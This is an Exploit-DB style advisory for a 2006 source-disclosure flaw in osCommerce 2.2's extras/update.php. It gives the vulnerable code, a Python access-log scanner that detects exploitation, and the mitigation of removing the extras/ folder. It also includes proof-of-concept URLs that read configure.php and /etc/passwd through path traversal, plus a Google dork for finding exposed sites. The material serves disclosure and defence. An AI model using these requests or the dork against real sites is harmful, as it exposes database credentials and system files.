Vendor: osCommerce
Author: rgod
CVSS: 7.5 (HIGH)
Type: Information/Source Code Disclosure
CWE: 200
Product Name: osCommerce
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:oscommerce:oscommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

osCommerce <= 2.2 "extras/" information/source code disclosure

osCommerce 2.2 is vulnerable to an information/source code disclosure. If the 'extras/' folder is deployed inside the web root, an attacker can view any file on the target system that the web server process can read, including PHP source code containing database credentials. The cause is the code in extras/update.php, which passes a request-supplied file name to file() without any validation and echoes the contents back.

Mitigation:

Remove the 'extras/' folder from the web root.
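A defender-side check for this issue, added here as an example and not part of the advisory or of osCommerce: it scans web-server access log lines (Apache/nginx combined format; the sample lines below are constructed) for requests to extras/update.php whose readme_file parameter names anything other than the three readme files the script is meant to display, and classifies the value as directory traversal, an absolute path, or an unexpected file name. The function and constant names are my own.

```python
"""Flag exploitation attempts against osCommerce 2.2 extras/update.php in access logs.

Added example, not project code. Assumes combined log format and that the
application is served under some prefix (e.g. /shop/), as in the advisory's PoC URLs.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: client ident user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The only files update.php legitimately displays (from the vulnerable code excerpt)
LEGIT_README = {"readme.txt", "README", "readme"}


def classify_readme_file(value: str) -> Optional[str]:
    """Return a reason string if a readme_file value is suspicious, else None."""
    decoded = unquote(unquote(value))  # tolerate double URL-encoding
    if decoded in LEGIT_README:
        return None
    if decoded.startswith(("/", "\\")):
        return "absolute path"
    if ".." in decoded.replace("\\", "/").split("/"):
        return "directory traversal"
    return "unexpected file name"


def scan_line(line: str) -> Optional[dict]:
    """Parse one log line; return a finding dict for a suspicious update.php request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/extras/update.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded here
    for value in params.get("readme_file", []):
        reason = classify_readme_file(value)
        if reason:
            return {
                "client": m.group("client"),
                "time": m.group("time"),
                "status": m.group("status"),
                "readme_file": unquote(value),
                "reason": reason,
            }
    return None


def scan_log(lines) -> list:
    """Return all findings for an iterable of log lines."""
    return [f for f in (scan_line(line) for line in lines) if f]


# Constructed sample log: one benign visit, one normal update.php call, two PoC-style
# requests copied from the advisory, and one legitimate readme request.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2006:10:01:02 +0000] "GET /catalog/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Apr/2006:10:01:05 +0000] "GET /shop/extras/update.php?read_me=0 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Apr/2006:10:02:11 +0000] "GET /shop/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php HTTP/1.1" 200 2210 "-" "curl/7.15"',
    '198.51.100.7 - - [14/Apr/2006:10:02:15 +0000] "GET /shop/extras/update.php?read_me=0&readme_file=%2Fetc%2Fpasswd HTTP/1.1" 200 1802 "-" "curl/7.15"',
    '203.0.113.5 - - [14/Apr/2006:10:03:00 +0000] "GET /shop/extras/update.php?read_me=0&readme_file=readme.txt HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['client']} {finding['reason']}: "
              f"readme_file={finding['readme_file']} (HTTP {finding['status']})")
```

A 200 status on a flagged request is the strongest signal, since it means update.php returned the file; a 404 on the same path usually indicates the extras/ folder has already been removed, which is the mitigation above.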

Exploit-DB raw data:

---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------

software site: http://www.oscommerce.com/


If the extras/ folder is placed inside the www path, you can see all files on the target
system, including PHP source code with database details. PoC:

http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd

This is the vulnerable code in update.php:

...
	include '../mysql.php';
	// $read_me and $readme_file are never initialised in this script; with
	// register_globals enabled they are populated directly from the request
	// if a readme.txt file exists, display it to the user
	if(!$read_me) {
		if(file_exists('readme.txt')) {
			$readme_file = 'readme.txt';
		}
		elseif(file_exists('README')) {
			$readme_file = 'README';
		}
		elseif(file_exists('readme')) {
			$readme_file = 'readme';
		}
		// when none of the three files exists, a request-supplied
		// $readme_file survives into file() below unchanged
		if($readme_file) {
			$readme = file($readme_file);	// reads whatever path the caller supplied
			print "<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
			print nl2br(htmlentities(implode($readme, ' ')));	// file contents echoed to the browser
			print "<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
			print "</TD></TR></TABLE>\n";
			exit;
		}
	}
...

Google search:

inurl:"extras/update.php" intext:mysql.php -display

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
--------------------------------------------------------------------------------

# milw0rm.com [2006-04-14]